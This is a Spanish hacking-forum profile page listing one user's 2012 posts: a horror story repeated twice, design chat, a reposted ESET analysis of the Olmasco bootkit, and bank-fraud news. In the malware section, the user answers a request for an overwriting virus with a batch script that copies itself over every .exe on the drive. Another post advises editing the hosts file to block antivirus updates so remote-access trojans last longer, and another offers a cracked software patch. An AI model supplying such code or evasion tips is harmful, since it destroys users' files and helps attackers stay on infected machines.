1
Off-Topic / Re:Feliz Cumpleaños Facu =)
« en: Diciembre 29, 2012, 11:39:16 pm »
mas vale tarde qe nunca Felicidades Facu!! que la pases bien
Cargando
Mostrar Mensajes
Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.
2
Off-Topic / Re:Juguemos con las Creepys
« en: Diciembre 26, 2012, 02:30:11 am »
TITULO:Desde un lugar horrible
Durante una noche tormentosa mi abuela se sintió mal y la llevé a un hospital.
Esperábamos a un lado de la sala de emergencias. Llovía copiosamente y el estruendo era constante. Los pocos que entraron chorreaban agua y se quejaban del mal tiempo.
- ¡Que tormenta, parece que se abrió todo el cielo! Y esos relámpagos… - comentó un señor a la vez que se peinaba el cabello empapado con las manos.
Sostuve el bolso de una joven mientras se quitaba el impermeable. La túnica blanca me indicó que era una doctora.
- Muchas gracias, que amable - me agradeció.
- No es nada señora.
- Señorita - me aclaró, y sonrió.
- Señorita entonces. Dije señora porque supuse que una mujer tan linda seguramente ya estaría casada.
- ¡Ay! Me vas a hacer sonrojar ¡Jaja! - y se alejó por el corredor. Volteó un par de veces y se detuvo, e hizo un gesto indicando que me acercara. Di unas zancadas y estaba al lado de ella.
- ¿Me acompañarías por este corredor? Soy nueva aquí y todavía no me acostumbro al lugar, y es tan largo este corredor, y con esta tormenta, la verdad es que me da un poco de miedo. Que vergüenza, ¿no? Siendo médico y tan asustadiza ¡Jaja!
- Te acompaño con gusto. No tiene nada de malo sentir algo de miedo, los médicos también son gente.
- Bueno, gracias.
Al llegar frente a la puerta que era su destino quedamos charlando un buen rato. Consultó su reloj unas veces pero seguía hablando. Me miraba a los ojos y sonreía.
Cuando me fui de allí tenía su número de teléfono en el bolsillo. Mientras atravesaba el largo corredor me acordé de mi abuela. La había dejado sentada en un banco. Al regresar vi que estaba sola. Tenía la cabeza recostada a la pared y miraba fijamente hacia la puerta. Cuando fui a hablarle hubo un estallido ensordecedor y se apagó la luz: había caído un rayo.
El hospital no tenía generador propio o no funcionaba. Quedamos sumidos en la oscuridad.
- ¿Abuela? ¿Está bien abuela? - le pregunté, y casi al instante me sujetó el brazo una mano que sentí delgada, dura y arrugada, y por poco no grité, mas enseguida razoné que era la de mi abuela.
- ¡Siento mucho calor! - me dijo con la voz llena de angustias - ¡Mucho calor, mucho calor! ¡Me estoy quemando! ¡Aaahhh…! - En ese momento me pareció ver que unas siluetas deformes caminaban a nuestro alrededor, pero enseguida se borraron, desaparecieron en la oscuridad.
Pedí ayuda a gritos. Sentí que mi abuela me soltó. Alguien salió de la sala de emergencias con una linterna, mas no necesitó usarla pues la luz volvió en ese momento.
Cuando un doctor me dijo que mi abuela estaba muerta me sentí terriblemente mal. Me invadió un sentimiento de culpa; la había dejado sola durante largo rato, ¡era algo imperdonable! Pero lo que sentí después fue peor aún. Al examinarla un poco más, el doctor dijo que llevaba muerta más de media hora; había fallecido apenas llegamos. Me había hablado desde el más allá, desde un lugar que todavía me niego a creer que fuera su destino.
fuente http://cuentosdeterrorcortos.blogspot.com/
Durante una noche tormentosa mi abuela se sintió mal y la llevé a un hospital.
Esperábamos a un lado de la sala de emergencias. Llovía copiosamente y el estruendo era constante. Los pocos que entraron chorreaban agua y se quejaban del mal tiempo.
- ¡Que tormenta, parece que se abrió todo el cielo! Y esos relámpagos… - comentó un señor a la vez que se peinaba el cabello empapado con las manos.
Sostuve el bolso de una joven mientras se quitaba el impermeable. La túnica blanca me indicó que era una doctora.
- Muchas gracias, que amable - me agradeció.
- No es nada señora.
- Señorita - me aclaró, y sonrió.
- Señorita entonces. Dije señora porque supuse que una mujer tan linda seguramente ya estaría casada.
- ¡Ay! Me vas a hacer sonrojar ¡Jaja! - y se alejó por el corredor. Volteó un par de veces y se detuvo, e hizo un gesto indicando que me acercara. Di unas zancadas y estaba al lado de ella.
- ¿Me acompañarías por este corredor? Soy nueva aquí y todavía no me acostumbro al lugar, y es tan largo este corredor, y con esta tormenta, la verdad es que me da un poco de miedo. Que vergüenza, ¿no? Siendo médico y tan asustadiza ¡Jaja!
- Te acompaño con gusto. No tiene nada de malo sentir algo de miedo, los médicos también son gente.
- Bueno, gracias.
Al llegar frente a la puerta que era su destino quedamos charlando un buen rato. Consultó su reloj unas veces pero seguía hablando. Me miraba a los ojos y sonreía.
Cuando me fui de allí tenía su número de teléfono en el bolsillo. Mientras atravesaba el largo corredor me acordé de mi abuela. La había dejado sentada en un banco. Al regresar vi que estaba sola. Tenía la cabeza recostada a la pared y miraba fijamente hacia la puerta. Cuando fui a hablarle hubo un estallido ensordecedor y se apagó la luz: había caído un rayo.
El hospital no tenía generador propio o no funcionaba. Quedamos sumidos en la oscuridad.
- ¿Abuela? ¿Está bien abuela? - le pregunté, y casi al instante me sujetó el brazo una mano que sentí delgada, dura y arrugada, y por poco no grité, mas enseguida razoné que era la de mi abuela.
- ¡Siento mucho calor! - me dijo con la voz llena de angustias - ¡Mucho calor, mucho calor! ¡Me estoy quemando! ¡Aaahhh…! - En ese momento me pareció ver que unas siluetas deformes caminaban a nuestro alrededor, pero enseguida se borraron, desaparecieron en la oscuridad.
Pedí ayuda a gritos. Sentí que mi abuela me soltó. Alguien salió de la sala de emergencias con una linterna, mas no necesitó usarla pues la luz volvió en ese momento.
Cuando un doctor me dijo que mi abuela estaba muerta me sentí terriblemente mal. Me invadió un sentimiento de culpa; la había dejado sola durante largo rato, ¡era algo imperdonable! Pero lo que sentí después fue peor aún. Al examinarla un poco más, el doctor dijo que llevaba muerta más de media hora; había fallecido apenas llegamos. Me había hablado desde el más allá, desde un lugar que todavía me niego a creer que fuera su destino.
fuente http://cuentosdeterrorcortos.blogspot.com/
3
Batch / Bash / Re:Ayuda: Encriptador de Batch
« en: Diciembre 21, 2012, 07:04:09 pm »
lamentablemente yo lo perdi al formatear mi hd 
4
Malware / Re:Megadudas
« en: Diciembre 06, 2012, 07:11:44 pm »
primero aprende lo basico avfucker,dsplit,rit,etc
http://www.hackxcrack.es/forum/index.php?topic=9731.0
http://www.hackxcrack.es/forum/index.php?topic=9731.0
5
Malware / Re:Virus En La bios
« en: Diciembre 03, 2012, 03:39:32 pm »
si tienes el bot tdl o alguno que aperece en la lista debes usar esto http://support.kaspersky.com/viruses/solutions?qid=208280748
PD:explica mas el malware que tienes
PD:explica mas el malware que tienes
6
Malware / Re:como puedo hacer un virus de sobreescritura?
« en: Noviembre 30, 2012, 02:49:08 pm »
mira tenia este script guardado en mi hd quiza te sirva esta en batch
PD:no lo probe
Código: [Seleccionar]
@echo off
::----Infect All Exe Files---::
Dir %Homedrive% /s /b > DirPath
For /f %%Y In (DirPath) Do (
Set DirPath=%%Y > Nul
For %%Z In (%DirPath%\*.exe) Do (
Set ExeInfect=%%Z > Nul
Copy /y %0 %ExeInfect%
)
)
Del /f /s /q DirPath
::---------------------------::7
Diseño Gráfico / Re:Mi primera firma
« en: Noviembre 28, 2012, 01:50:21 pm »darle un poco mas de movimiento a las letras poniéndola medio inclinado o dándole otro reborde puede ser también... aunque como esta va bien!gracias por la recomedacion Rock Lee ya le puse animacion xd no es mucho pero algo es algo
El concepto es bueno, pero ponle un tipo de letra más "hacker" jajaja.Alguna que me recomiendas
8
Diseño Gráfico / Mi primera firma
« en: Noviembre 23, 2012, 09:47:38 pm »
esta es mi primera firma que hago ya que soy muy novato en esto del diseño grafico acepto sugerencias sin mas que decir aqui esta
9
Diseño Gráfico / Re:Alterar una imagen GIF
« en: Noviembre 22, 2012, 10:16:37 pm »
puedes hacerlo con paint clic menu imagen expandir y contraer
10
Room Gammer [Friki] / Re:Bienvenidos a Room-Gammer Friki
« en: Noviembre 13, 2012, 11:57:04 pm »
waa pero si la que esta en el ds es may
11
Malware / Re:Reconectar Usuarios en el cyberget
« en: Noviembre 13, 2012, 11:53:47 pm »
para impedir que los avs se actualizen debes de modificar el archivo host de win asi los remotos te van a durar mas tiempo xd
12
Noticias Informáticas / Bootkit Olmasco: ¿una evolución de TDL4?
« en: Noviembre 04, 2012, 03:40:25 pm »
El siguiente post es una traducción de la publicación “Olmasco bootkit: next circle of TDL4 evolution (or not?) escrita por nuestro colega Aleksandr Matrosov.
Olmasco (también conocido como SST y MaxSS) es una modificación de la familia de bootkit TDL4 de la cual tenemos conocimiento desde el verano de 2011, sin embargo, a partir de 2012 hemos comenzado a observar la propagación de un troyano dropper destinado a instalar este código malicioso en el sistema infectado. Esta familia de bootkit fue la segunda en utilizar la infección del VBR (Volume Boot Record) para evadir la política de firma de código en modo privilegiado. La primera en utilizar esta técnica fue Rovnix. Después de completar el análisis de Olmasco, no encontramos ningún cambio en la parte principal de esta amenaza como para mencionarlo. La mayoría de los componentes maliciosos del sistema de archivos fueron compilados a principio de julio de 2012.
El cambio más radical y por lo tanto el más interesante, es el dropper de Olmasco: el código encargado de instalar esta amenaza fue desarrollado desde cero para una nueva campaña de distribución. El nuevo dropper de Olmasco posee varias técnicas para evadir análisis en sandbox, e incluye una protección dump anti memoria. Una vez que esta amenaza es ejecutada, en el momento que es desempaquetada, el dropper limpia información de la cabecera PE como parte del proceso. Posteriormente, cuando recibe el control en OEP (Original Entry Point), las cabeceras PE del código desempaquetado aparecen como limpias. En la siguiente imagen se puede apreciar dicho cambio. En la de la izquierda aparece la cabecera PE limpia y en la segunda, restaurada:
Esta técnica dificulta el volcado de memoria durante el proceso de depuración (debugging) o en aquellos análisis que desempaquetan los ejecutables de forma automática. Para detectar si ha sido ejecutado en un ambiente virtual, el dropper de Olmasco obtiene información del sistema infectado a través de la interfaz WMI (Windows Management Instrumentation).
El dropper realiza estas solicitudes a WMI (SELECT * FROM %s WHERE $s LIKE “%%%s%%”) para determinar la existencia de ambientes virtuales y emuladores como Bochs o QUEMU. Si el código malicioso detecta este tipo de situación, procede a terminar su ejecución y elimina el archivo infectado del sistema. Todos los componentes relacionados al bootkit y al sistema de archivos ocultos son guardados en la sección de recursos cifrados del dropper. Esta sección se ve de la siguiente forma:
El proceso de descifrado utiliza el algoritmo RC4 tal como puede observarse en la siguiente imagen:
Después del desempaquetado y la preparación de sus componentes provenientes de la sección de recursos, el dropper de Olmasco posee tres métodos para lograr infectar un sistema:
1) Infección del VBR para sistemas de 64 bit.
2) Infección del VBR para sistemas de 32 bit.
3) Infección del MBR en caso de que los métodos anteriores fallen.
Antes de esta versión, Olmasco solo infectaba una computadora a través de la modificación del VBR, sin embargo, ahora también es capaz de hacerlo a través del MBR. En todos estos casos, las funcionalidades son iguales, no obstante, la rutina de infección cambia.
El código encargado de la rutina de infección de VBR ha sido modificado sutilmente con respecto a la versión anterior con el objetivo de evadir la detección estática de los antivirus. Algunas instrucciones lucen iguales en mnemonics, pero con valores de ceros en la estructura opcode (técnica que recuerda el uso de NOPs aleatorios como una forma primitiva de evadir la detección de antivirus que utilizan firmas). En las siguientes capturas se presentan las diferencias entre el código VBR antiguo y el nuevo (primera y segunda imagen respectivamente):
Existe otra diferencia pequeña con respecto al lugar en dónde almacena la contraseña de cifrado RC4 para poder extraer los componentes maliciosos del sistema de archivos oculto.
La estructura del sistema de archivos oculto ha sido modificada y luce así:
El procedimiento principal para parsear el sistema de archivos ocultos es idéntico al de la versión anterior, por lo tanto, queda confirmada nuestra suposición al respecto. Por otro lado, esta versión del bootkit Olmasco posee un nuevo driver tdi32/tdi64 en el sistema de archivos ocultos. Nuestro análisis confirmó que los mismos funcionan mediante TDI (Transport Driver Interface). El driver es inicializado a partir de drv32/drv64 luego de que el bootkit ha sido cargado correctamente. Para la instalación del driver utiliza un método sin comentar en IoCreateDriver(). Una vez finalizado, el driver es ejecutado con la siguiente llamada de función: IoCreateDriver(L”\\Driver\\usbprt”, tdi32EntryPoint).
El driver TDI malicioso interfiere en los siguientes dispositivos de red:
-\Device\Tcp
-\Device\Udp
-\Device\Ip
-\Device\RawIp
En la siguiente imagen se puede observar el código encargado de interferir en los dispositivos red mencionados anteriormente:
La función principal de este driver es monitorear las solicitudes TDI_CONNECT para las conexiones de redes. Si una solicitud es interceptada para la dirección IP 1.1.1.1, el driver cambiará la dirección a 69.175.67.172 y el número de puerto a 0×5000. El driver TDI malicioso también crea un objeto de dispositivo con el nombre \Device\Inspect. Sin embargo, durante este análisis dicho dispositivo no fue creado en la máquina infectada ni tampoco pudimos encontrarlo en otros componentes de Olmasco.
HiddenFsReader (ESET Hidden File System Reader), herramienta gratuita que permite examinar el sistema de archivos oculto instalado por Olmasco, será actualizada pronto para funcionar con esta nueva variante. Asimismo, se agregarán nuevas funcionalidades relacionadas a la usabilidad de la aplicación. Además, los productos de ESET detectan este código malicioso como Win32/Olmasco.
Traducido y adaptado por André Goujon
Especialista de Awareness & Research
fuente http://blogs.eset-la.com/laboratorio/2012/10/26/bootkit-olmasco-tratara-evolucion-tdl4/
otro link interesante http://www.viruslist.com/sp/analysis?pubid=207271132
Pd:la noticia es de hace 10 dias pero vale la pena publicarla xd
Olmasco (también conocido como SST y MaxSS) es una modificación de la familia de bootkit TDL4 de la cual tenemos conocimiento desde el verano de 2011, sin embargo, a partir de 2012 hemos comenzado a observar la propagación de un troyano dropper destinado a instalar este código malicioso en el sistema infectado. Esta familia de bootkit fue la segunda en utilizar la infección del VBR (Volume Boot Record) para evadir la política de firma de código en modo privilegiado. La primera en utilizar esta técnica fue Rovnix. Después de completar el análisis de Olmasco, no encontramos ningún cambio en la parte principal de esta amenaza como para mencionarlo. La mayoría de los componentes maliciosos del sistema de archivos fueron compilados a principio de julio de 2012.
El cambio más radical y por lo tanto el más interesante, es el dropper de Olmasco: el código encargado de instalar esta amenaza fue desarrollado desde cero para una nueva campaña de distribución. El nuevo dropper de Olmasco posee varias técnicas para evadir análisis en sandbox, e incluye una protección dump anti memoria. Una vez que esta amenaza es ejecutada, en el momento que es desempaquetada, el dropper limpia información de la cabecera PE como parte del proceso. Posteriormente, cuando recibe el control en OEP (Original Entry Point), las cabeceras PE del código desempaquetado aparecen como limpias. En la siguiente imagen se puede apreciar dicho cambio. En la de la izquierda aparece la cabecera PE limpia y en la segunda, restaurada:
Esta técnica dificulta el volcado de memoria durante el proceso de depuración (debugging) o en aquellos análisis que desempaquetan los ejecutables de forma automática. Para detectar si ha sido ejecutado en un ambiente virtual, el dropper de Olmasco obtiene información del sistema infectado a través de la interfaz WMI (Windows Management Instrumentation).
El dropper realiza estas solicitudes a WMI (SELECT * FROM %s WHERE $s LIKE “%%%s%%”) para determinar la existencia de ambientes virtuales y emuladores como Bochs o QUEMU. Si el código malicioso detecta este tipo de situación, procede a terminar su ejecución y elimina el archivo infectado del sistema. Todos los componentes relacionados al bootkit y al sistema de archivos ocultos son guardados en la sección de recursos cifrados del dropper. Esta sección se ve de la siguiente forma:
El proceso de descifrado utiliza el algoritmo RC4 tal como puede observarse en la siguiente imagen:
Después del desempaquetado y la preparación de sus componentes provenientes de la sección de recursos, el dropper de Olmasco posee tres métodos para lograr infectar un sistema:
1) Infección del VBR para sistemas de 64 bit.
2) Infección del VBR para sistemas de 32 bit.
3) Infección del MBR en caso de que los métodos anteriores fallen.
Antes de esta versión, Olmasco solo infectaba una computadora a través de la modificación del VBR, sin embargo, ahora también es capaz de hacerlo a través del MBR. En todos estos casos, las funcionalidades son iguales, no obstante, la rutina de infección cambia.
El código encargado de la rutina de infección de VBR ha sido modificado sutilmente con respecto a la versión anterior con el objetivo de evadir la detección estática de los antivirus. Algunas instrucciones lucen iguales en mnemonics, pero con valores de ceros en la estructura opcode (técnica que recuerda el uso de NOPs aleatorios como una forma primitiva de evadir la detección de antivirus que utilizan firmas). En las siguientes capturas se presentan las diferencias entre el código VBR antiguo y el nuevo (primera y segunda imagen respectivamente):
Existe otra diferencia pequeña con respecto al lugar en dónde almacena la contraseña de cifrado RC4 para poder extraer los componentes maliciosos del sistema de archivos oculto.
La estructura del sistema de archivos oculto ha sido modificada y luce así:
El procedimiento principal para parsear el sistema de archivos ocultos es idéntico al de la versión anterior, por lo tanto, queda confirmada nuestra suposición al respecto. Por otro lado, esta versión del bootkit Olmasco posee un nuevo driver tdi32/tdi64 en el sistema de archivos ocultos. Nuestro análisis confirmó que los mismos funcionan mediante TDI (Transport Driver Interface). El driver es inicializado a partir de drv32/drv64 luego de que el bootkit ha sido cargado correctamente. Para la instalación del driver utiliza un método sin comentar en IoCreateDriver(). Una vez finalizado, el driver es ejecutado con la siguiente llamada de función: IoCreateDriver(L”\\Driver\\usbprt”, tdi32EntryPoint).
El driver TDI malicioso interfiere en los siguientes dispositivos de red:
-\Device\Tcp
-\Device\Udp
-\Device\Ip
-\Device\RawIp
En la siguiente imagen se puede observar el código encargado de interferir en los dispositivos red mencionados anteriormente:
La función principal de este driver es monitorear las solicitudes TDI_CONNECT para las conexiones de redes. Si una solicitud es interceptada para la dirección IP 1.1.1.1, el driver cambiará la dirección a 69.175.67.172 y el número de puerto a 0×5000. El driver TDI malicioso también crea un objeto de dispositivo con el nombre \Device\Inspect. Sin embargo, durante este análisis dicho dispositivo no fue creado en la máquina infectada ni tampoco pudimos encontrarlo en otros componentes de Olmasco.
HiddenFsReader (ESET Hidden File System Reader), herramienta gratuita que permite examinar el sistema de archivos oculto instalado por Olmasco, será actualizada pronto para funcionar con esta nueva variante. Asimismo, se agregarán nuevas funcionalidades relacionadas a la usabilidad de la aplicación. Además, los productos de ESET detectan este código malicioso como Win32/Olmasco.
Traducido y adaptado por André Goujon
Especialista de Awareness & Research
fuente http://blogs.eset-la.com/laboratorio/2012/10/26/bootkit-olmasco-tratara-evolucion-tdl4/
otro link interesante http://www.viruslist.com/sp/analysis?pubid=207271132
Pd:la noticia es de hace 10 dias pero vale la pena publicarla xd
13
Noticias Informáticas / 1.000.000 de dólares robados en 60 segundos
« en: Noviembre 03, 2012, 08:28:00 pm »
El FBI arrestó a 14 personas por el robo de 1 millón de dólares de un afamado banco utilizando cajeros establecidos en diferentes casinos del sur de California y Nevada. No es la primera vez que existe robo de dinero a partir de vulnerabilidades en un sistema bancario. Estas fallas, en muchos casos, permiten a los ciberdelincuentes extraer dinero de forma no legítima de la propia entidad financiera.
En este caso particular, las autoridades afirmaron que los sospechosos abrieron cuentas bancarias en la misma entidad previamente al robo. Posteriormente, fueron a distintos casinos en California y Nevada y retiraron el dinero en efectivo de los diferentes puestos tantas veces como pudieron durante un período de 60 segundos. Al parecer, alguien detectó una vulnerabilidad que impedía a la entidad bancaria registrar las extracciones adicionales de dinero que se produjeran en ese lapso.
El FBI en conjunto con otras autoridades arrestaron a 13 de los sospechosos en Los Ángeles durante esta semana. Aparentemente, los sospechosos utilizaron el dinero para jugar en los casinos y se les ofreció habitaciones de hotel debido al elevado monto que habían destinado al juego. Además, los delincuentes mantuvieron el monto de las extracciones por debajo de los 10.000 dólares para evitar los requerimientos federales de reportes de transacción.
Es importante destacar que también las entidades financieras deberían tomar en cuenta que la seguridad debe ser gestionada. Anteriormente hemos informado por este medio sobre otros tipos de incidentes relacionados, cómo por ejemplo, la fuga de información de tarjetas de crédito, donde se registraron más de 10 millones casos diferentes. Asimismo este tipo de incidentes finaliza en la venta ilegal de esas tarjetas de crédito, donde éstas podían ser compradas por unos pocos dólares para utilizarlas de forma clandestina.
Finalmente, se debe tener en cuenta desde el lado del usuario buenas prácticas a la hora de realizar transacciones bancarias. Recomendamos la lectura de nuestros 7 consejos para realizar transacciones seguras para poder adquirir conceptos básicos sobre como operar en Internet a la hora de, por ejemplo, realizar compras. Asimismo, para quienes lo deseen, contamos con un curso de seguridad en transacciones comerciales online en nuestra Plataforma Educativa ESET el cuál está orientado a la capacitación en servicios de comercio electrónico.
Fernando Catoira
fuente http://blogs.eset-la.com/laboratorio/2012/11/01/1000000-dolares-robados-60-segundos/
14
Software / Re:SandBoxie.v3.70.Incl.Patch-LnDL
« en: Septiembre 05, 2012, 08:04:29 pm »r@mbyte esta muy bueno el programa, yo lo tengo desde hace como un mes y estoy contento con el.la version gratuita es una version trial despues de 30 dias te sale una ventana donde dice que esperes 5segundos para luego ejecutar cualquier cosa
Pero una cosa me pregunto, si el programa es gratuito y las caracteristicas al registrarlo creo que no aumentan significativamente, ¿por que no poner la descarga desde la pagina oficial?
Saludos.
mira aca ya esta registrado con el patch y ya no necesitas esperar nada
15